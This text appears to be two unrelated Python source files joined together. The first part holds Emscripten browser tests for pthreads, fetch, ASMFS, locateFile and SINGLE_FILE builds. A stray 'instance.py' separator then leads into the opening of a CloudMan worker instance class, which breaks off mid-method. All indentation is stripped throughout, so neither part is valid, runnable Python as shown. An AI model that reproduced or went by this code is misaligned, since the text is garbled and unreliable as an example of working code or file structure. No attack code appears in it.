# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args+mem_init_mode+['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)]*256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one');
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two');
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world');
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail');
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat');
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2*1024*1024
open('huge.dat', 'wb').write(bytearray((x*x)&255 for x in range(size*2))) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args+['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'TOTAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '--proxy-to-worker'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
|
instance.py
|
"""CloudMan worker instance class"""
import datetime as dt
import json
import logging
import logging.config
import threading
import time
from boto.exception import EC2ResponseError
from cm.services import ServiceRole
from cm.services import ServiceType
from cm.util import instance_lifecycle, instance_states, misc, spot_states, Time
from cm.util.decorators import TestFlag
log = logging.getLogger('cloudman')
# Time well in past to seend reboot, last comm times with.
TIME_IN_PAST = dt.datetime(2012, 1, 1, 0, 0, 0)
class Instance(object):
def __init__(self, app, inst=None, m_state=None, last_m_state_change=None,
reboot_required=False, spot_request_id=None):
self.app = app
self.config = app.config
self.spot_request_id = spot_request_id
self.lifecycle = instance_lifecycle.SPOT if self.spot_request_id else instance_lifecycle.ONDEMAND
self.inst = inst # boto object of the instance
self.spot_state = None
self.private_ip = None
self.public_ip = None
self.local_hostname = None
if inst:
try:
self.id = str(inst.id)
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
else:
self.id = None
# Machine state as obtained from the cloud middleware (see
# instance_states Bunch)
self.m_state = m_state
self.last_m_state_change = Time.now()
# A time stamp when the most recent update of the instance state
# (m_state) took place
self.last_state_update = Time.now()
self.is_alive = False
self.num_cpus = 1
self.total_memory = 1 # in bytes
self.time_rebooted = TIME_IN_PAST # Initialize to a date in the past
self.reboot_count = 0
self.terminate_attempt_count = 0
self.last_comm = TIME_IN_PAST # Initialize to a date in the past
self.nfs_data = 0
self.nfs_tools = 0
self.nfs_indices = 0
self.nfs_sge = 0
self.nfs_tfs = 0 # Transient file system, NFS-mounted from the master
self.get_cert = 0
self.sge_started = 0
self.slurmd_running = 0
# NodeName by which this instance is tracked in Slurm
self.alias = 'w{0}'.format(self.app.number_generator.next())
self.worker_status = 'Pending' # Pending, Wake, Startup, Ready, Stopping, Error
self.load = 0
self.type = 'Unknown'
self.reboot_required = reboot_required
self.update_spot()
def __repr__(self):
return self.get_desc()
def maintain(self):
""" Based on the state and status of this instance, try to do the right thing
to keep the instance functional. Note that this may lead to terminating
the instance.
"""
def reboot_terminate_logic():
""" Make a decision whether to terminate or reboot an instance.
CALL THIS METHOD CAREFULLY because it defaults to terminating the
instance!
"""
if self.reboot_count < self.config.instance_reboot_attempts:
self.reboot()
elif self.terminate_attempt_count >= self.config.instance_terminate_attempts:
log.info("Tried terminating instance {0} {1} times but was unsuccessful. Giving up."
.format(self.inst.id, self.config.instance_terminate_attempts))
self._remove_instance()
else:
log.info("Instance {0} not responding after {1} reboots. Terminating instance."
.format(self.id, self.reboot_count))
self.terminate()
# Update state then do resolution
state = self.get_m_state()
if state == instance_states.PENDING or state == instance_states.SHUTTING_DOWN:
if (Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
log.debug("'Maintaining' instance {0} stuck in '{1}' state.".format(
self.get_desc(), state))
reboot_terminate_logic()
elif state == instance_states.ERROR:
log.debug("'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(), instance_states.ERROR))
reboot_terminate_logic()
elif state == instance_states.TERMINATED:
